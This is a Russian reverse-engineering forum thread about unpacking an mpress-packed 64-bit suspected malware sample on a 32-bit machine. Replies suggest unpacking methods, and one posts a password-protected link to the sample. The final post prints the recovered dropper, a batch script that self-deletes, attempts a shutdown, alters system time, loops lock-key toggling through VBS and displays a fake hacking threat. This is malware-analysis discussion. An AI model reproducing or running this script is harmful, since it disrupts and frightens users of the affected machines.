eXeLab
eXeL@B ВИДЕОКУРС !

ВИДЕОКУРС
выпущен 4 ноября!


УЗНАТЬ БОЛЬШЕ >>
Домой | Статьи | RAR-cтатьи | FAQ | Форум | Скачать | Видеокурс
Новичку | Ссылки | Программирование | Интервью | Архив | Связь

Русский / Russian English / Английский

Сейчас на форуме: (+6 невидимых)
 · Начало · Статистика · Регистрация · Поиск · ПРАВИЛА ФОРУМА · Язык · RSS · SVN ·

 eXeL@B —› Протекторы —› Распаковка x64 mpress на x86
Посл.ответ Сообщение


Ранг: 238.8 (наставник)
Статус: Участник
CyberHunter

Создано: 19 февраля 2013 13:37 New!
Цитата · Личное сообщение · #1

Собственно сабж: есть файл (99% малварный) упакованный mpress, формат PE32+. Как можно его распаковать на x86 тачке? Пробовал переделать в обычный PE: приклеил секции к обычному PE хидеру, поправил все адреса директорий и секций, в итоге файл вроде ровный и даже в олю грузится, но сразу на оеп падает из-за кривого кода:

Code:
  1. 00416233  PUSH EDI
  2. 00416234  PUSH ESI
  3. 00416235  PUSH EBX
  4. 00416236  PUSH ECX
  5. 00416237  PUSH EDX
  6. 00416238  INC ECX
  7. 00416239  PUSH EAX
  8. 0041623A  DEC EAX
  9. 0041623B  LEA EAX,DWORD PTR DS:[ADE]
  10. 00416241  DEC EAX
  11. 00416242  MOV ESI,DWORD PTR DS:[EAX]               ; <<<<< тут падает
  12. 00416244  DEC EAX
  13.  


Как быть?

http://rghost.ru/43910400


Ранг: 1993.2 (!!!!)
Статус: Модератор
retired

Создано: 19 февраля 2013 13:39 New!
Цитата · Личное сообщение · #2

Переделать в обычный пе-бессмысленное занятие, хотя бы потому, что инструкции в х64 другие.
Либо статик анпакер, либо никак, ищи х64 тачку.


Ранг: 238.8 (наставник)
Статус: Участник
CyberHunter

Создано: 19 февраля 2013 13:45 New!
Цитата · Личное сообщение · #3

Если нету ни того, ни другого, то забить?


Ранг: 990.3 (! ! !)
Статус: Модератор
Author of DiE

Создано: 19 февраля 2013 13:46 New!
Цитата · Личное сообщение · #4

попросить кого-нить чтоб анпакнули, потом грузить в иду и изучать в статике

Ранг: 370.2 (мудрец)
Статус: Участник

Создано: 19 февраля 2013 14:04 New!
Цитата · Личное сообщение · #5

Bochs, Qemu. Очень, очень медленно, но если сильно нужно то это вариант.

| Сообщение посчитали полезным: Flint


Ранг: 300.0 (мудрец)
Статус: Участник

Создано: 19 февраля 2013 14:05 New!
Цитата · Личное сообщение · #6

http://rghost.ru/private/43911201/d605ad2cace33ac002c8c8581913c172
пароль virus

| Сообщение посчитали полезным: Flint


Ранг: 33.4 (посетитель)
Статус: Участник

Создано: 19 февраля 2013 14:12 New!
Цитата · Личное сообщение · #7

__http://www.hexblog.com/?p=403


Ранг: 238.8 (наставник)
Статус: Участник
CyberHunter

Создано: 19 февраля 2013 14:19 New!
Цитата · Личное сообщение · #8

Оказалось это был дропер:
Code:
  1. @echo off                  
  2. del "%0" >nul
  3. shutdown --640 -"VZLOM SUSTEM" ->nul
  4. time 21:11 >nul
  5. echo off 
  6. echo Chr(39)>%temp%\temp1.vbs 
  7. echo Chr(39)>%temp%\temp2.vbs  
  8. echo on error resume next > %temp%\temp.vbs 
  9. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs 
  10. echo set FSO=createobject("scripting.filesystemobject")>>%t emp%\temp.vbs 
  11. echo do >> %temp%\temp.vbs 
  12. echo wscript.sleep 200 >> %temp%\temp.vbs 
  13. echo s.sendkeys"{capslock}">> %temp%\temp.vbs 
  14. echo wscript.sleep 200 >> %temp%\temp.vbs 
  15. echo s.sendkeys"{numlock}">> %temp%\temp.vbs 
  16. echo wscript.sleep 200 >> %temp%\temp.vbs 
  17. echo s.sendkeys"{scrolllock}">> %temp%\temp.vbs 
  18. echo loop>> %temp%\temp.vbs 
  19. start %temp%\temp.vbs 
  20. start %temp%\temp1.vbs 
  21. start %temp%\temp2.vbs
  22. md GAME OVER      
  23. msg * "Вы ВЗЛОМАНЫ ваша система будет удалена через 640 секунд!!!!!!!" >nul
  24. start Taskmgr
  25. start calc 
 eXeL@B —› Протекторы —› Распаковка x64 mpress на x86

Оригинальный DVD-ROM: eXeL@B DVD !

Вы находитесь на форуме сайта EXELAB.RU
Проект ReactOS